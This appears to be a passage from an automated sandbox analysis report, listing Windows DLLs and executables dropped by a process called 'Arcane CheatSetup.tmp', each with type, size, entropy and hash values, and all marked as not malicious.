                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):178240
                                Entropy (8bit):6.793245389378621
                                Encrypted:false
                                SSDEEP:3072:gWosiKTxga2KtpdhEnGF5PNyR0BxDxxKF5HkEWnuYsauj9Fom1QB:3RRKAtpdhEn/0BzwFpvYm0z
                                MD5:BF299F73480AF97A750492E043D1FADD
                                SHA1:C93C4A2DAE812F31603E42D70711D3B6822F9E8E
                                SHA-256:0334E3B7AE677116B92516172D0CA905723DAF847D8B3B0DC3FC118EDC703D51
                                SHA-512:7265783F0DD653DBC4693D5EFEB156281620C5421F29910F14C22B75A936233E9E897087E64B641335795484837F28F113EE9F380027698A898F19115FD0F648
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.474237923131844
                                Encrypted:false
                                SSDEEP:384:Gps45cnQ6DmSHhV8r0eeU4Szi6nYPLr70aG:Gpsnn4S/8rxeUvC7RG
                                MD5:9A4CF09834F086568DF469E3F670BF07
                                SHA1:594C4E0394475A6299C79E3A063C7D5AE49635F3
                                SHA-256:709E9E544434C52285A72F29AD6B99CE1E7668545F10AD385C87ABF34D2052BB
                                SHA-512:CD551E7944461F3288B880B9D161F19F97EB4599A3A46CC93C4172B5112960FB0C040B9996F13CF0761FB85A283E2F20944135EC59660C807A59B29CDDC44586
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.477340414037824
                                Encrypted:false
                                SSDEEP:384:Gps45cnk6LlmSHhV8i+ceek4SzS+nYPLr7wd:Gpsnn5AS/8jZek7C7wd
                                MD5:4DE6BFE6EA98BC42A5358ED8307107B2
                                SHA1:8F687E60784FD9046A361DC1DC85D43051CBD577
                                SHA-256:7C07D167AA4A23AB64A205301663C87E578FF6B31985DF8B51AF80CA6999176F
                                SHA-512:8091AADEACAD1DAC5191EBB996D1E4BE25A19C10A4E76F79AB7EA2A592711FD39AAD7E89D7DEE09385296AA7A649AABFA7C325C4A627AFE1C009C906709EDB5A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.477747126356611
                                Encrypted:false
                                SSDEEP:384:GpsJ5cn66FmSHhV8Teeek4SzSgnYPLr7mpB:GpsUngS/8TDekdC7yB
                                MD5:CA17B8CBD623477C5D1D334B79890225
                                SHA1:2BFC372A28EDE40093286CDA45003951A2CE424F
                                SHA-256:A7AC47AC8518E2D53575E12521B3A766A5E2EE4133C6C6AB9AE1C3C6777F5E77
                                SHA-512:D9DDF3E67B9A4E0197D271243623D4DF8A26A35EC2F5195AB316E910E133BA09C70F6D28E7CA69184E4ABABCF063C014D7A6E6EA48F82382B316864A945175C5
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.476844183458217
                                Encrypted:false
                                SSDEEP:384:Gpsw5cnL6U0mSHhV89+ee84SzSFnYPLr7KTdK:Gps/nHpS/89je80C7KQ
                                MD5:B4AD335E868693F009B7644E2ED555C1
                                SHA1:ECCB9711CF78BCD5BD78231A838B1852764B301C
                                SHA-256:CCA46A54A1A9CE78F7FFC49D195C4AB970AD540B5FCB2B6D9BF57EEDF38EC28D
                                SHA-512:04A4670345B47C5B256220A85FFC68A1DD6DFE8D44838A4C634EB0EBC469EFC307B0BCF838AA1244634A315F365518B1633586B872C6D459EE80374D14234CA4
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):185920
                                Entropy (8bit):6.517453559791758
                                Encrypted:false
                                SSDEEP:3072:pmxoFzYbnERrNyf0VCyqp2pswAG8wJfV1cnrQKUCc9rBTq/bKQcUMZ:koFJcQCyuZG8wdKcLgbDcU6
                                MD5:D4246AF96E1FFA5E63C55E6F0A63ED82
                                SHA1:30F319CEBD7BCCCFC3637231D07F45BD5A79B03E
                                SHA-256:84576AAC88D08E864645415D8A81F4B8F04C881B7624973C952BA6BCB94F4C8C
                                SHA-512:92EDFE62BE5BDDC47EC51B01F8FE71C69691423ABECBB358A972766ACCDC8F9365C064FD0A7833C8853EDD5DED51791A7662584DB5F54BE3586AC2787160FA6A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):33344
                                Entropy (8bit):6.5580840927675945
                                Encrypted:false
                                SSDEEP:768:5TuVpsEkV3/azbYJHf2ZdCwhxKdv0tCFC7dRb:5YQV3/az8x2HCSScC4dRb
                                MD5:EFF31A13A4A5D3E9A5BD36E7349D028B
                                SHA1:8E47BE8C1CE4DFD73B7041679E96EA4A17DDB4C0
                                SHA-256:307B816892FDD9BAD9E28953E1BBB4BCE35C8F8CA783C369D7EB52A22BCC4229
                                SHA-512:72148C757624868D3866C40B31149CCA171737D82ADBCDF2C8FB03A9D8F3C1CEA2B2FC5137DD11DAAD2328D3AF8FAE43568DCCD843664BC43323F9357B67B6A0
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):574528
                                Entropy (8bit):6.508068830472597
                                Encrypted:false
                                SSDEEP:12288:NtKMEr1LBBgPcvhwhtRtL+tKJZetu4zxLukaMevlOjPMat4+8NMutQaLqqiINw3X:NtKMEr1VBgPcvhwhtRtL+tkZezxLuQeS
                                MD5:5E1B7D0ACCB4275DEAB6312AA246CB3E
                                SHA1:488A5CB9D9C0CF27824DF32B9B76D4F67F6FB485
                                SHA-256:9FC49B3F6FD11A2B2B92748C24F21721D1011B1920D092E38AF4021102125543
                                SHA-512:5A875DD4731E862F753EBB987593DC61D39DD3D3D13CDED284DE27DD09AFA946FA96824AC194EC0DD45AA2CE0D56637A5522F49F28F3C89B7F5248D389B1B62E
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):455328
                                Entropy (8bit):6.698367093574994
                                Encrypted:false
                                SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                MD5:FD5CABBE52272BD76007B68186EBAF00
                                SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):773968
                                Entropy (8bit):6.901569696995594
                                Encrypted:false
                                SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
                                MD5:BF38660A9125935658CFA3E53FDC7D65
                                SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
                                SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
                                SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):970912
                                Entropy (8bit):6.9649735952029515
                                Encrypted:false
                                SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                MD5:034CCADC1C073E4216E9466B720F9849
                                SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):79936
                                Entropy (8bit):6.675027571633986
                                Encrypted:false
                                SSDEEP:1536:ygRdVzzmTj2iu+wk5eQjBE55W+hYRwZZ3GFjJJ5n5WF:yIfmHsM5j6VqJJ55WF
                                MD5:691B937A898271EE2CFFAB20518B310B
                                SHA1:ABEDFCD32C3022326BC593AB392DEA433FCF667C
                                SHA-256:2F5F1199D277850A009458EDB5202688C26DD993F68FE86CA1B946DC74A36D61
                                SHA-512:1C09F4E35A75B336170F64B5C7254A51461DC1997B5862B62208063C6CF84A7CB2D66A67E947CBBF27E1CF34CCD68BA4E91C71C236104070EF3BEB85570213EC
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):51264
                                Entropy (8bit):6.565433654691718
                                Encrypted:false
                                SSDEEP:768:a+BEJER/xSW/EoB8VBQZbKYawLysHFhIAqQbQMD8YpwQ+Qi4v8qUYVC7R:a+BEJERvQGbKnwusjIAq08YDi4UqUYoR
                                MD5:95EDB3CB2E2333C146A4DD489CE67CBD
                                SHA1:79013586A6E65E2E1F80E5CAF9E2AA15B7363F9A
                                SHA-256:96CF590BDDFD90086476E012D9F48A9A696EFC054852EF626B43D6D62E72AF31
                                SHA-512:AB671F1BCE915D748EE49518CC2A666A2715B329CAB4AB8F6B9A975C99C146BB095F7A4284CD2AAF4A5B4FCF4F939F54853AF3B3ACC4205F89ED2BA8A33BB553
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):17472
                                Entropy (8bit):6.403594687791098
                                Encrypted:false
                                SSDEEP:192:A3PK394shTLHzW8KMw3X+PVR6y/FNdoEUtnYe+PjPriT0fwoBpp6Z:BThTrzPPQOPV5NNdoEwnYPLr7xc
                                MD5:94CAADA66F6316A9415A025C68388A18
                                SHA1:57544E446B2B0CFBA0732F1F46522354F94B7908
                                SHA-256:D1C4FB91296D643AEE6AB9CD66CC70ACBE2667AD572D969A06FFEAA2A8859FAF
                                SHA-512:AC29E7C722A266DCB633953EF2A7E33DF02059AC7876FF94828464B5B74B5BC321C5D2D2851F3CBBFE1328D18F3CD9A49E5EFFE7E4E8AC2BEB3A0E4AAA53AD87
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):6.380289288441742
                                Encrypted:false
                                SSDEEP:384:GpsCgvnvId6YmSHhV85AeencGtnYPLr7Vz:GpsDngGS/851ebC7Vz
                                MD5:7DA6AA3CC4763C6F9C20B43E6C9A9547
                                SHA1:3F28CF8E6AAD199DCC621F2A2C8AD50126813B05
                                SHA-256:F7375AD07F0BE6FD75E822A9ECFF5ACA073DB03B95894C05C7657BEC7AF59AF4
                                SHA-512:7948EAA11B4026F9975B6CC4225A4C0B617341299364196F3825EEF4484A6EEB529319BF4F6D19436689083C36BF1F6B9880574764612FC900C8CC1D73EED1BB
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.4779230305378315
                                Encrypted:false
                                SSDEEP:384:Gpsk5Bn46zmSHhV8yYAeeU4Sz5uwnYPLr73ki:GpsungS/8yY1eUuwC79
                                MD5:E9AA62B1696145A08D223E7190785E25
                                SHA1:A9A0CB22A28A3843CF6CCBC9578B1438F0A7B500
                                SHA-256:EA9DF3432EF31B6864112AF1CEC94E6BE33B92A9030369B9F99225113BCA6EF8
                                SHA-512:516FA102922980DF592DD08A840DA9073B6568F5E52847968C59995F2BD067AC6D2668D0272AE017D0C71AF627766A8676AE1EB1BC520B76F1F9C5CEEB4BA840
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):773968
                                Entropy (8bit):6.901569696995594
                                Encrypted:false
                                SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
                                MD5:BF38660A9125935658CFA3E53FDC7D65
                                SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
                                SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
                                SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):172096
                                Entropy (8bit):6.3747906238754855
                                Encrypted:false
                                SSDEEP:3072:1WkHL+UE3r2l5p2WqjgFWcWpPa6QoCzOb/UcODMM4cBqg8UyJNd5uGZzfYtRD+Em:YdNq5YkFuPYzOb/UcODMM4cBqg8UyJNR
                                MD5:FB658E2F5E185FE5762B169A388BA0BD
                                SHA1:386235AB2F7AD35E82CD9AC97E9B56E1E308BC90
                                SHA-256:A91E68C76A90A02D9EDF75E5141C248B3AA5DD612E37883D27065D78A782AF20
                                SHA-512:B0EAB6F2572552298CD221AF9E71CA7C02375D92E14F7EBD783F5DC9247964F72E658DBFC4273BD3C36DF57199171263F1A4969F133823965448C552BB514EEC
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.477211573452372
                                Encrypted:false
                                SSDEEP:384:Gps25Bnb61mSHhV8nOeet4SzvBQnYPLr7D8/:Gpson1S/8nTetJSC7+
                                MD5:ED3F3D8E4C382BF8095B9DE217511E29
                                SHA1:CAE91B9228C99DCC88BAC3293822AC158430778C
                                SHA-256:800F41B877AA792A8469C4DBB99838E7A833B586EC41BD81DA81EAA571F7FAC1
                                SHA-512:023855267C6CC6BD5230E7A922310328E8DC0521C041C038C579035C9B1E70EAC168695B56357793505375E0B134FAD040BB284C6B02B3190EE7F6FCAEC33FE9
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):52800
                                Entropy (8bit):6.433054716020523
                                Encrypted:false
                                SSDEEP:1536:Rk2X5KQaT9nNrmTTY99ccAlGGzGRulFJWpiDO:RkgUhpmA99ccOGGzGRuPJWpgO
                                MD5:6D05EAD2F6B95C4AFFCFB1B27DC0C188
                                SHA1:0D04A67505D006493F252985AC294B534D271EF2
                                SHA-256:6330591A151E565B5EAB2D174DF8E2F6523A8F403E4E8D8C8DC58D0945881F19
                                SHA-512:DBE98FA16162636039853E9A82CADBE4E6D5A4E6E282A3FBBC122229C314C91E7C445FEB83921EBFE024DC09BC6AA76682F903036A2D2BEA363F1D09DD571B10
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):116288
                                Entropy (8bit):5.7845827860105885
                                Encrypted:false
                                SSDEEP:3072:UbqmeUF67oaebwU3ta+uHMg9glgFvcfgfgzgG4g9XTXDXp+RuXGXlXdY9vXTXvXQ:8qmeUF67ZeUUVjcIA
                                MD5:5AADADF700C7771F208DDA7CE60DE120
                                SHA1:E9CF7E7D1790DC63A58106C416944FD6717363A5
                                SHA-256:89DAC9792C884B70055566564AA12A8626C3AA127A89303730E66ABA3C045F79
                                SHA-512:624431A908C2A835F980391A869623EE1FA1F5A1A41F3EE08040E6395B8C11734F76FE401C4B9415F2055E46F60A7F9F2AC0A674604E5743AB8301DBADF279F2
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):86592
                                Entropy (8bit):6.686302444148156
                                Encrypted:false
                                SSDEEP:1536:/QsPinZd9lmzFRQnJ9sSpkWgVenAe7C3xWxNO3A4:lPE9lEmtpkj7eqWxNCA4
                                MD5:5E6DDF7CF25FD493B8A1A769EF4C78F7
                                SHA1:42748051176B776467A31885BB2889C33B780F2D
                                SHA-256:B9BEACA57BFF23C953917C0B2037351EF3334E6A9DE447DCA6542FE5C815BF9F
                                SHA-512:C47F742F064B99E5B9C2BDEAC97472D9D8C9466C9071E9799AF79F820199D9B30B198C33EF635F07A972B77475AFEA9E7417AA6335D22A7380E7B0E552869C18
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):14912
                                Entropy (8bit):6.381906222478272
                                Encrypted:false
                                SSDEEP:192:kNncquU+hyD13XLPVlD6o+N9F5os7USnYe+PjPriT0fwXF27:kNcWp7PVl67/nYPLr7s27
                                MD5:3C9DC0ED8ADD14A0E5B845C1ACC2FF2E
                                SHA1:25C395ADE02199BEDCEE95C65E088B758CD84435
                                SHA-256:367C552FBA3DA5F22791CF8F22B983871639ECD2EF7F5B1880021FE4C4F65EE4
                                SHA-512:4DD5F68180D03B6621E46732F04B47F996B96F91F67845538D1B303E598CCFDB5E4F785A76DE7DFCB8918125FDB06B9068C4EAB06984B5AA9224DCE90190BA1A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.466364086630595
                                Encrypted:false
                                SSDEEP:384:Gpss5cnn6vmSHhV8TI1ee84SzK8nYPLr7HuY:Gps7nnS/8Tte8tC7HuY
                                MD5:12B6E1C3205A8B17AC20E00A889DFC43
                                SHA1:42458CFA7135858ACEF10803B87A208FA7E66413
                                SHA-256:EAEA20A794EC6BB15808EF278376A87CF91F9BE15FE6A7DE92014AC4BF75555D
                                SHA-512:174703820636DED2BA081420A8D1E37D67FDA6C13AC406C2F08E16DCF0C7B7D9642E37BC888802B50ED3438D6029C4FECCD7C151B82CF9A91F13F36C4A0B2019
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.475930674615241
                                Encrypted:false
                                SSDEEP:384:GpsFG5BnK6xmSHhV8TCeeX4SzREnYPLr7Ggp:Gpsen0S/8TveXUC7jp
                                MD5:31C0CED43A07A2DFF3AFC557EBABBE0F
                                SHA1:9100A7393B919EB35C79CE16A559D783219E2F20
                                SHA-256:B93D0D62436D89C84C66ABBDCF817084A6BA01F7E10053C8F343DF5D53D37536
                                SHA-512:716818BBF6E4F21C2A627259F1D35E8375EFEF9C3B197B3AF6E10A4A1735CC643141C32270DF7F6FE25733517BE38CAA09205B98119996237E8EAE6A7D0825A7
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.475447140204412
                                Encrypted:false
                                SSDEEP:384:Gps85BnF26emSHhV8QM1eet4SzvBonYPLr7I:GpsGnFjS/8QBetJWC7I
                                MD5:43C1D1D0E248604CB3B643C0BDF4EC9A
                                SHA1:7BEE9DEB1E43F0FECF0FC57BDFD3F79CF048151F
                                SHA-256:165BFF317674BE33F2920320F3EF0957539E5BF149B673C2073DF48FF93A6D94
                                SHA-512:CAA9B14DF20FFF92CFC4F9A8557804FBD4CC02831824CD53AEAC7D0EE7918BBD50E22A69AB5FFC9E92A468A5201DF263707D373D60378817DC5FEFDE1ABC48BF
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):177216
                                Entropy (8bit):6.909590121652277
                                Encrypted:false
                                SSDEEP:3072:L9Wyo+Jyru3w8WqWnJjOUrI7vh+Dug9PVWU+kmaVE9TBfQiJ8:BWyPsi34i+DugFj+kmaVE9TB4/
                                MD5:8DC2356E3FF3A595AEDE81594A2D259A
                                SHA1:A05E05E9EA8FB0C8928112CA931EB4F5E977B92A
                                SHA-256:B9DE5D3ABBC0AC956E7F590E4C8507FF570B6C353374BB80F413B5846CE322FE
                                SHA-512:D5C83EBDB7192DD361856B236A07AFD4FF95E68E0036396D68A3407ED680D4A36EC857AB101DBA5F583AA67CC45A2835178DAC84A68472C7F619EFA674FE51F0
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):473152
                                Entropy (8bit):5.475991416072106
                                Encrypted:false
                                SSDEEP:6144:ngmgmb+p19k+j4QJKFDSha+IJ6NyLu/wtAWvrMZp5WMuBzj:n17bsj4QJlha+XNyLu/iAWvhBzj
                                MD5:79CFE207E05F771E29847573593F6DE1
                                SHA1:34DFA813802C6F5A57A557BF72B2B306F8042E90
                                SHA-256:AEB27727F428116069944BB92B477D7487C9DEB3921E1005814536459E35222F
                                SHA-512:2C71A827BB156BD012BE20B30D701D5123D8B6C7889D4F4A47A483D3477C25BF224E7F205CA9FCCB08DA0A2EF28AF6433D018A0E555BCE911C31A5F462F41578
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):52800
                                Entropy (8bit):6.367562931371078
                                Encrypted:false
                                SSDEEP:768:0UD9dxWf4b4UoY6sUsaJ2sQ7O+phclByW3T9KMDbgz2dN6lDb/9/YMw0c3D6QsTY:0IofovBbS9KMvHR0cz6QsTPOXm2BT9j7
                                MD5:F434A8AC7F1C8C0E2587B9A9F30E397B
                                SHA1:BD62E10E44117A60EB4180412112593D9460299D
                                SHA-256:6A994B389B8F7109238DE6F230B1B540186ED2EC8D081C7601C6996863AA4DC8
                                SHA-512:9896DAC36BD4F7289C7701B75AD8EB9F7ACD233384075A3FBA6E6F2F38E420F37C1A29317EEEA3C4DDBA1791F6F17187DD5BDFDD9F98F095E7D4DF20C0D5EA3E
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):123968
                                Entropy (8bit):6.699694377005066
                                Encrypted:false
                                SSDEEP:1536:jWi/SLhxEJKv0O4+zwtKg3HquHB2u0YUdRXGCDilgKptxG0ULtt1vtxgl0IlgqA2:+vdtg6ZYUniPe5vtxgl0IlgqA2
                                MD5:0BAB62A0CF67481EA2A7F3CAFD7C5144
                                SHA1:D6B010C815F4D9C675DF918B615FE0AAE45249EA
                                SHA-256:FC57682FDBCA50FAEBFC6B4F5D199FC407A541C110C15F0C850503006D32301A
                                SHA-512:0128813DE247246BF4AECE1B222B6611E5AE1EDE01A1B339CFE0F98184739D7A066DAE4F1A271F544BB39F9B79F053F4B96F2E471B9444C29855CF52FB7835CB
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):25664
                                Entropy (8bit):6.488681310308951
                                Encrypted:false
                                SSDEEP:384:GxZ2v7Oc56lspQEgde9M3z27lFOJIjkzIPV5yKlWFKbKwnYPLr7Wo5L:Xr5PQEOe9MD4lFhjk8ddeKWwC7dL
                                MD5:039AD8A7A4B14C321F156878838A2340
                                SHA1:6AD9D2FBA988193D16E7B3278C0D0757AB99B3EF
                                SHA-256:ED3AD7EBA989FB31C2ABC3220694D1446D33659782CB1B333318EC54A577389D
                                SHA-512:7D5B8C191A7D0C4FEDB831DE197A3CB5DC0564AD3F2E57EEE8C506B2308B656D2F0FE086D508FAB8F03CA0E1B0574E708728373DFA3116C9B9FC5DFDB72FEE46
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):195136
                                Entropy (8bit):6.80727029211823
                                Encrypted:false
                                SSDEEP:3072:fmtIwyq6lFq857zCYLFYEVothL10xYOXjV5qECVTHLy71vJ2qIcWYEfQQxIYh5t+:mIwyqM7qYLVVIqhfqfTm1W+Tws
                                MD5:E1904A4B2D6F657B9FEF053893FE3C41
                                SHA1:59AC965A1029AE936DDD5AE623A9A025D49737EC
                                SHA-256:5929E3510F67FEAE073B8995BFC542FD7A0626F57D2FBC829EFC95206DF8F85F
                                SHA-512:C0A60928299EA2E6DC8AD1E3DE9CEF77C8E520585F8D73BD7F56E33705D1A2AEC04AE9C01A8069AE5A0D71F28AEF42F4A260CF4D5BB44A95DCEB70E5C8DB8FEA
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):6.392776971200692
                                Encrypted:false
                                SSDEEP:384:GpssZwnvNmc6DDmSHhV8Ogee1cGPnYPLr7fl:GpssqnFm16S/8OVeLC7fl
                                MD5:7624A9B769CDCF3A75FE5A9FEAADD61F
                                SHA1:9269968968CD63D6E1ECC14F78B9A630FCC26FBE
                                SHA-256:41F9A804C888A58DECDE2B63A544DBFF536B40D87CECED197E1A14050858C0DA
                                SHA-512:1AF7BB30E1FC7600AD0A209DB4E077DAB9CEAA5C4332F8B1353ED0DB7EA71B4A9B7D126E756B634D3FB22618E39AFC5ED52263C88E9F7646EAABB0D9240E382B
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):65600
                                Entropy (8bit):6.461111208462538
                                Encrypted:false
                                SSDEEP:1536:lVeogiQWo3IzLIoDY9p6K/sdDAZ5e1x3afX:veDib4oDu4K/sdDAZ5CxEX
                                MD5:806580640A68234A711D3BB0642130A7
                                SHA1:1EDF20DAAC15FE90E9891E95130D0DD70D005B62
                                SHA-256:CCCC2A9F54E4F5961DD45DAA1F6C97ECFB156EA8E0DF82277A2C109EA4D2E036
                                SHA-512:0AAC087449DEECBB1CFAEE5C3144500CDC4C1D209D1F1F7D8EB41DD7870504BF71D0CC9AE7761BFC609F42273B7FB3CA7801AA54FB0E92BC71C41CC5CAECD31C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):159296
